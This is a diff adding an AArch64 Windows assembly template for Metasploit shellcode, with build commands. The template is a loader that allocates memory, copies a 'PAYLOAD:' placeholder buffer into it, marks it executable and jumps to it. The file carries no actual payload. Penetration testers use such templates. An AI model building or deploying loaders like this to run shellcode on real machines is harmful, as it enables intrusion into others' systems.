|
| 1 | +; |
| 2 | +; A minimal AArch64 PE template for Metasploit shellcode |
| 3 | +; Author: Alexander 'xaitax' Hagenah |
| 4 | +; |
| 5 | +; --- Compilation (Microsoft Visual Studio Build Tools) --- |
| 6 | +; 1. Assemble: |
| 7 | +; armasm64.exe -o template_aarch64_windows.obj template_aarch64_windows.asm |
| 8 | +; |
| 9 | +; 2. Link: |
| 10 | +; LINK.exe template_aarch64_windows.obj /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe |
| 11 | +; |
| 12 | +; |
| 13 | + AREA |.text|, CODE, READONLY |
| 14 | + |
| 15 | +; Import the Win32 functions we need from kernel32.dll |
| 16 | + IMPORT VirtualAlloc |
| 17 | + IMPORT VirtualProtect |
| 18 | + IMPORT ExitProcess |
| 19 | + |
| 20 | +; Define constants for Win32 API calls |
| 21 | +SCSIZE EQU 4096 |
| 22 | +MEM_COMMIT EQU 0x1000 |
| 23 | +PAGE_READWRITE EQU 0x04 |
| 24 | +PAGE_EXECUTE EQU 0x10 |
| 25 | + |
| 26 | +; Export the entry point of our program |
| 27 | + EXPORT main |
| 28 | + |
| 29 | +main |
| 30 | + ; Allocate space on the stack for the oldProtection variable (DWORD) |
| 31 | + sub sp, sp, #16 |
| 32 | + |
| 33 | + ; --- 1. Allocate executable memory --- |
| 34 | + ; hfRet = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT, PAGE_READWRITE); |
| 35 | + mov x0, #0 |
| 36 | + mov x1, #SCSIZE |
| 37 | + mov x2, #MEM_COMMIT |
| 38 | + mov x3, #PAGE_READWRITE |
| 39 | + ldr x8, =VirtualAlloc |
| 40 | + blr x8 |
| 41 | + |
| 42 | + ; Check if VirtualAlloc failed. If so, exit. |
| 43 | + cbz x0, exit_fail |
| 44 | + |
| 45 | + ; Save the pointer to our new executable buffer in a non-volatile register |
| 46 | + mov x19, x0 |
| 47 | + |
| 48 | + ; --- 2. Copy the payload into the new buffer --- |
| 49 | + ; This is a simple memcpy(dest, src, size) |
| 50 | + mov x0, x19 ; x0 = dest = our new buffer |
| 51 | + ldr x1, =payload_buffer ; x1 = src = the payload in our .data section |
| 52 | + mov x2, #SCSIZE ; x2 = count |
| 53 | +copy_loop |
| 54 | + ldrb w3, [x1], #1 ; Load byte from src, increment src pointer |
| 55 | + strb w3, [x0], #1 ; Store byte to dest, increment dest pointer |
| 56 | + subs x2, x2, #1 ; Decrement counter |
| 57 | + b.ne copy_loop ; Loop if not zero |
| 58 | + |
| 59 | + ; --- 3. Change memory permissions to executable --- |
| 60 | + ; VirtualProtect(hfRet, SCSIZE, PAGE_EXECUTE, &dwOldProtect); |
| 61 | + mov x0, x19 ; x0 = buffer address |
| 62 | + mov x1, #SCSIZE ; x1 = size |
| 63 | + mov x2, #PAGE_EXECUTE ; x2 = new protection |
| 64 | + mov x3, sp ; x3 = pointer to oldProtection on the stack |
| 65 | + ldr x8, =VirtualProtect |
| 66 | + blr x8 |
| 67 | + |
| 68 | + ; --- 4. Execute the payload --- |
| 69 | + ; Jump to the shellcode we just copied and protected. |
| 70 | + blr x19 |
| 71 | + |
| 72 | +exit_success |
| 73 | + ; Shellcode returned, or we are done. Exit cleanly. |
| 74 | + mov x0, #0 ; Exit code 0 |
| 75 | + ldr x8, =ExitProcess |
| 76 | + blr x8 |
| 77 | + |
| 78 | +exit_fail |
| 79 | + ; Something went wrong. Exit with code 1. |
| 80 | + mov x0, #1 |
| 81 | + ldr x8, =ExitProcess |
| 82 | + blr x8 |
| 83 | + |
| 84 | +; The data section where the payload will be located. |
| 85 | +; The 'PAYLOAD:' tag must be at the very beginning of this buffer. |
| 86 | +payload_buffer |
| 87 | + DCB "PAYLOAD:" |
| 88 | + SPACE SCSIZE - 8 ; Reserve the rest of the 4096 bytes |
| 89 | + |
| 90 | + END |
0 commit comments